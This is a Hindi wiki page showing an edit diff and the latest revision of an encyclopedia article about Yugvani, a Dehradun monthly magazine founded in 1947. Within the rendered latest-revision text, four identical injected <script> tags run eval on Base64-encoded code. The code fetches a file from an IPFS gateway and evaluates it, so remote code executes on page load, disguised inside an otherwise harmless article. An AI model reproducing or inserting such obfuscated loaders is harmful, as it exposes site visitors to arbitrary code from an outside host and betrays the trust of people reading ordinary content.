Difference between revisions of "युगवाणी (पत्रिका)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पृथक " to "पृथक् ")
 
(4 intermediate revisions by one other user not shown)
Line 1: Line 1:
<!-- सबसे पहले इस पन्ने को संजोएँ (सेव करें) जिससे आपको यह दिखेगा कि लेख बनकर कैसा लगेगा -->
+
[[चित्र:Yugwani cover noe 09.jpg|thumb|250px|युगवाणी आवरण पृष्ठ]]
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
+
{{बहुविकल्प|बहुविकल्पी शब्द=युगवाणी|लेख का नाम=युगवाणी}}
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
+
'''युगवाणी''' एक मासिक [[पत्रिका]] है जो [[15 अगस्त]], [[1947]] से [[देहरादून]] ([[उत्तराखण्ड]]) से प्रकाशित होती है। युगवाणी का आरंभ एक पाक्षिक [[समाचार पत्र]] के रूप में हुआ था जो कालान्तर में पहाड़ का प्रमुख साप्ताहिक समाचार पत्र बना तथा [[उत्तराखंड राज्य आन्दोलन| उत्तराखण्ड राज्य आन्दोलन]] के परिणाम स्वरूप अस्तित्व में आने वाले पृथक् उत्तराखण्ड राज्य की स्थापना माह [[नवम्बर]] [[2000]] से नियमित मासिक [[पत्रिका]] के रूप में प्रकाशित हो रही है।
[[चित्र:Yugwani cover noe 09.jpg|left|thumb|250px|युगवाणी]]
+
[[चित्र:Arunoday.jpg|thumb|left|250px|युगवाणी का प्रवेशांक 15 अगस्त 1947, को प्रकाशित [[पं. नेहरू]] का वक्तव्य]]
  
[[चित्र:Arunoday.jpg|right|thumb|250px|युगवाणी का प्रवेशांक 15 अगस्त 1947,प्रकाशित [http://hi.bharatdiscovery.org/india/%E0%A4%9C%E0%A4%B5%E0%A4%BE%E0%A4%B9%E0%A4%B0%E0%A4%B2%E0%A4%BE%E0%A4%B2_%E0%A4%A8%E0%A5%87%E0%A4%B9%E0%A4%B0%E0%A5%82 पं0 नेहरू] का वक्तव्य]]
 
[[उत्तराखण्ड]] [[राज्य]] की प्रमुख मसिक पत्रिका जिसके प्रकाशन का आरंभ [[15 अगस्त]] [[1947]] को एक पाक्षिक समाचार पत्र के रूप में हुआ था जो कालान्तर में पहाड का प्रमुख साप्ताहिक समाचार पत्र बना तथा [[उत्तराखंड राज्य आन्दोलन| उत्तराखण्ड राज्य आन्दोलन]] के परिणाम स्वरूप अस्तित्व में आने वाले पृथक [[उत्तराखण्ड]] राज्य की स्थापना माह [[नवम्बर]] [[2000]] से नियमित मासिक [[पत्रिका]] के रूप में प्रकाशित हो रही है।
 
युगवाणी एक मासिक हिन्दी पत्रिका है जो अब इंटरनेट पर www.gadyakosh.org/yugvani उपलब्ध है।
 
  
  
==शीर्षक उदाहरण 1==
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
[http://www.gadyakosh.org/gk/index.php?title=%E0%A4%AF%E0%A5%81%E0%A4%97%E0%A4%B5%E0%A4%BE%E0%A4%A3%E0%A5%80_%28%E0%A4%AA%E0%A4%A4%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%95%E0%A4%BE%29]
 
===शीर्षक उदाहरण 2===
 
 
 
====शीर्षक उदाहरण 3====
 
 
 
=====शीर्षक उदाहरण 4=====
 
 
 
<!-- कृपया इस संदेश से ऊपर की ओर ही सम्पादन कार्य करें। ऊपर आप अपनी इच्छानुसार शीर्षक और सामग्री डाल सकते हैं -->
 
 
 
<!-- यदि आप सम्पादन में नये हैं तो कृपया इस संदेश से नीचे सम्पादन कार्य न करें -->
 
 
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
+
*[http://www.gadyakosh.org/gk/index.php?title=%E0%A4%AF%E0%A5%81%E0%A4%97%E0%A4%B5%E0%A4%BE%E0%A4%A3%E0%A5%80_%28%E0%A4%AA%E0%A4%A4%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%95%E0%A4%BE%29 युगवाणी (पत्रिका)]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{समाचार पत्र और पत्रिकाएँ}}
[[Category:नया पन्ना सितम्बर-2012]]
+
[[Category:साहित्य कोश]]
 
+
[[Category:समाचार पत्र और पत्रिकाएँ]]
 +
[[Category:समाज कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 13:26, 1 August 2017

thumb|250px|yugavani avaran prishth

chitr:Disamb2.jpg yugavani ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- yugavani

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

yugavani ek masik patrika hai jo 15 agast, 1947 se deharadoon (uttarakhand) se prakashit hoti hai. yugavani ka aranbh ek pakshik samachar patr ke roop mean hua tha jo kalantar mean paha d ka pramukh saptahik samachar patr bana tatha uttarakhand rajy andolan ke parinam svaroop astitv mean ane vale prithakh uttarakhand rajy ki sthapana mah navambar 2000 se niyamit masik patrika ke roop mean prakashit ho rahi hai. [[chitr:Arunoday.jpg|thumb|left|250px|yugavani ka praveshaank 15 agast 1947, ko prakashit pan. neharoo ka vaktavy]]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>